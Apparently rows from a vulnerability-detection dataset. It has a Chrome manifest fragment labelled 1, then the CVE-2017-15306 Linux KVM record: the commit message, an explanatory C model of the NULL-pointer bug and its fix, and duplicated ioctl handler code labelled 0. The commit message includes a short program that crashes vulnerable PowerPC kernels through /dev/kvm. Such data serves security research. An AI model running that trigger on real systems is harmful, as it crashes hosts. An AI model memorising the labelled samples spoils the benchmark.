if (!source.GetString(keys::kIncognito, &value)) {
*error = errors::kInvalidIncognitoBehavior;
return false;
}
if (value == values::kIncognitoSpanning) {
incognito_split_mode_ = false;
} else if (value == values::kIncognitoSplit) {
incognito_split_mode_ = true;
} else {
*error = errors::kInvalidIncognitoBehavior;
return false;
}
}
if (HasMultipleUISurfaces()) {
*error = errors::kOneUISurfaceOnly;
return false;
}
InitEffectiveHostPermissions();
DCHECK(source.Equals(manifest_value_.get()));
return true;
}
|
C
|
Chrome
| 1 |
CVE-2017-15306
|
https://www.cvedetails.com/cve/CVE-2017-15306/
|
CWE-476
|
https://github.com/torvalds/linux/commit/ac64115a66c18c01745bbd3c47a36b124e5fd8c0
|
ac64115a66c18c01745bbd3c47a36b124e5fd8c0
|
KVM: PPC: Fix oops when checking KVM_CAP_PPC_HTM
The following program causes a kernel oops:
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <linux/kvm.h>
main()
{
int fd = open("/dev/kvm", O_RDWR);
ioctl(fd, KVM_CHECK_EXTENSION, KVM_CAP_PPC_HTM);
}
This happens because when using the global KVM fd with
KVM_CHECK_EXTENSION, kvm_vm_ioctl_check_extension() gets
called with a NULL kvm argument, which gets dereferenced
in is_kvmppc_hv_enabled(). Spotted while reading the code.
Let's use the hv_enabled fallback variable, like everywhere
else in this function.
Fixes: 23528bb21ee2 ("KVM: PPC: Introduce KVM_CAP_PPC_HTM")
Cc: stable@vger.kernel.org # v4.7+
Signed-off-by: Greg Kurz <groug@kaod.org>
Reviewed-by: David Gibson <david@gibson.dropbear.id.au>
Reviewed-by: Thomas Huth <thuth@redhat.com>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
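Note that the fix described above does not land in the ioctl handler recorded below but in kvm_vm_ioctl_check_extension() in arch/powerpc/kvm/powerpc.c. The following is a minimal, self-contained C model of the failure mode, assuming simplified stand-in types (struct kvm, struct kvm_arch); only the names hv_enabled and is_kvmppc_hv_enabled() are taken from the commit message. It is a sketch of the bug pattern, not the upstream patch itself.

/* Model of CVE-2017-15306: KVM_CHECK_EXTENSION on the global /dev/kvm fd
 * reaches the capability check with kvm == NULL.  Types are simplified
 * stand-ins; only hv_enabled and is_kvmppc_hv_enabled() follow the kernel. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

struct kvm_arch { bool hv_enabled; };
struct kvm      { struct kvm_arch arch; };

/* Dereferences kvm unconditionally, like the kernel helper. */
static bool is_kvmppc_hv_enabled(struct kvm *kvm)
{
        return kvm->arch.hv_enabled;
}

/* Buggy shape: the HTM capability check calls the helper directly,
 * so a NULL kvm (query on the global fd) dereferences NULL. */
static int check_htm_buggy(struct kvm *kvm)
{
        return is_kvmppc_hv_enabled(kvm);
}

/* Fixed shape: compute a NULL-safe hv_enabled fallback first, as the
 * commit message says the rest of kvm_vm_ioctl_check_extension() does. */
static int check_htm_fixed(struct kvm *kvm)
{
        bool hv_enabled = (kvm != NULL) && kvm->arch.hv_enabled;
        return hv_enabled;
}

int main(void)
{
        printf("fixed path with NULL kvm: %d\n", check_htm_fixed(NULL));
        /* check_htm_buggy(NULL) would crash, mirroring the reported oops. */
        return 0;
}

The point of the fixed shape is simply that the capability path never touches the possibly-NULL kvm pointer directly; the real patch swaps the direct is_kvmppc_hv_enabled(kvm) call for the already-computed hv_enabled local.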
|
long kvm_arch_vcpu_ioctl(struct file *filp,
unsigned int ioctl, unsigned long arg)
{
struct kvm_vcpu *vcpu = filp->private_data;
void __user *argp = (void __user *)arg;
long r;
switch (ioctl) {
case KVM_INTERRUPT: {
struct kvm_interrupt irq;
r = -EFAULT;
if (copy_from_user(&irq, argp, sizeof(irq)))
goto out;
r = kvm_vcpu_ioctl_interrupt(vcpu, &irq);
goto out;
}
case KVM_ENABLE_CAP:
{
struct kvm_enable_cap cap;
r = -EFAULT;
if (copy_from_user(&cap, argp, sizeof(cap)))
goto out;
r = kvm_vcpu_ioctl_enable_cap(vcpu, &cap);
break;
}
case KVM_SET_ONE_REG:
case KVM_GET_ONE_REG:
{
struct kvm_one_reg reg;
r = -EFAULT;
if (copy_from_user(&reg, argp, sizeof(reg)))
goto out;
if (ioctl == KVM_SET_ONE_REG)
r = kvm_vcpu_ioctl_set_one_reg(vcpu, &reg);
else
r = kvm_vcpu_ioctl_get_one_reg(vcpu, &reg);
break;
}
#if defined(CONFIG_KVM_E500V2) || defined(CONFIG_KVM_E500MC)
case KVM_DIRTY_TLB: {
struct kvm_dirty_tlb dirty;
r = -EFAULT;
if (copy_from_user(&dirty, argp, sizeof(dirty)))
goto out;
r = kvm_vcpu_ioctl_dirty_tlb(vcpu, &dirty);
break;
}
#endif
default:
r = -EINVAL;
}
out:
return r;
}
|
long kvm_arch_vcpu_ioctl(struct file *filp,
unsigned int ioctl, unsigned long arg)
{
struct kvm_vcpu *vcpu = filp->private_data;
void __user *argp = (void __user *)arg;
long r;
switch (ioctl) {
case KVM_INTERRUPT: {
struct kvm_interrupt irq;
r = -EFAULT;
if (copy_from_user(&irq, argp, sizeof(irq)))
goto out;
r = kvm_vcpu_ioctl_interrupt(vcpu, &irq);
goto out;
}
case KVM_ENABLE_CAP:
{
struct kvm_enable_cap cap;
r = -EFAULT;
if (copy_from_user(&cap, argp, sizeof(cap)))
goto out;
r = kvm_vcpu_ioctl_enable_cap(vcpu, &cap);
break;
}
case KVM_SET_ONE_REG:
case KVM_GET_ONE_REG:
{
struct kvm_one_reg reg;
r = -EFAULT;
if (copy_from_user(&reg, argp, sizeof(reg)))
goto out;
if (ioctl == KVM_SET_ONE_REG)
r = kvm_vcpu_ioctl_set_one_reg(vcpu, &reg);
else
r = kvm_vcpu_ioctl_get_one_reg(vcpu, &reg);
break;
}
#if defined(CONFIG_KVM_E500V2) || defined(CONFIG_KVM_E500MC)
case KVM_DIRTY_TLB: {
struct kvm_dirty_tlb dirty;
r = -EFAULT;
if (copy_from_user(&dirty, argp, sizeof(dirty)))
goto out;
r = kvm_vcpu_ioctl_dirty_tlb(vcpu, &dirty);
break;
}
#endif
default:
r = -EINVAL;
}
out:
return r;
}
|
C
|
linux
| 0 |